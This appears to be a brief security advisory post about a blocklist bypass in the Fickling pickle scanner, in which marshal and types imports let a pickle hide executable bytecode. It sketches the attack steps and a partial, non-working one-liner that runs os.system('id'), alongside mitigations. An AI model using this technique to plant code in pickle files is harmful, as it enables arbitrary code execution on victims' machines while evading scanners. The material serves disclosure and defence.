Listen to this Post
The vulnerability is a detection bypass in the Fickling security analysis tool for Python pickle files. Pickle deserialization can execute arbitrary code by importing modules and calling functions. Fickling maintains a blocklist of unsafe modules (like os.system) to flag malicious files. This CVE worked because the `marshal` and `types` modules were missing from that blocklist. An attacker could craft a pickle that uses `marshal.loads()` to deserialize and execute a bytecode payload, then use `types.FunctionType()` to wrap it into a callable function, effectively hiding the malicious code. When Fickling analyzed such a file, its static analysis failed to recognize these imports as dangerous, incorrectly labeling the file as “LIKELY_SAFE.” Additionally, malformed pickles could cause a stack exhaustion crash in the interpreter, though this was a separate denial-of-service issue. The core security failure was the incomplete blocklist, allowing for code execution bypass.
Platform: Fickling
Version: Prior to PR186
Vulnerability : Unsafe Module Bypass
Severity: Critical
date: Report Published 2023
Prediction: 2023-10-15
What Undercode Say:
`fickling -s malicious.pickle`
`python3 -c “import pickle, marshal, types; payload = marshal.dumps((lambda: __import__(‘os’).system(‘id’)).__code__); data = b\”\”\”(…pickle ops…)\”\”\”; pickle.loads(data)”`
`cat safety_result.json | grep severity`
How Exploit:
1. Attacker builds pickle using `marshal.loads()` with bytecode.
2. Pickle uses `types.FunctionType()` to create callable.
3. Victim runs Fickling, gets false ‘LIKELY_SAFE’.
4. Victim unpickles file, executes arbitrary code.
Protection from this CVE
Update to Fickling post-PR186.
Never unpickle untrusted data.
Use tools with allowlists, not blocklists.
Impact:
Arbitrary code execution.
Security tool bypass.
Potential system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

